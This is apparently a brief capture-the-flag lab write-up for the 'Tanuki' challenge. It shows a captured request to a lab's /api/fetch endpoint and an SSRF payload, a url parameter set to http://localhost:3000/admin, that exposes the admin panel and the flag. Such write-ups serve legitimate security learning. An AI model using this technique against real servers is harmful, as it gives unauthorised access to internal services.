Tanuki

Level: Easy Points: 10 Type: Daily Challenge

Lab Interface

The interesting request is for the stats page

POST /api/fetch HTTP/2
Host: lab-1772553605009-wg1rjm.labs-app.bugforge.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6NCwidXNlcm5hbWUiOiJzdXNoaWwiLCJpYXQiOjE3NzI1NTM2MjF9.NPJaxSBBUjqSBrSgRHp4NCNbsAsL4b0mgELIsnBsCj8
Content-Length: 43
Origin: https://lab-1772553605009-wg1rjm.labs-app.bugforge.io
Referer: https://lab-1772553605009-wg1rjm.labs-app.bugforge.io/leaderboard
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: green
Priority: u=0
Te: trailers

{"url":"http://localhost:3000/leaderboard"}

Possible SSRF

I tried editing the url parameter.

Only port 3000 is allowed.

After little bit of tinkering: http://localhost:3000/admin revealed the admin panel and flag.

PreviousSSRF (Server-Side Request Forgery)NextJWT None Algorithm Attack

Last updated 1 month ago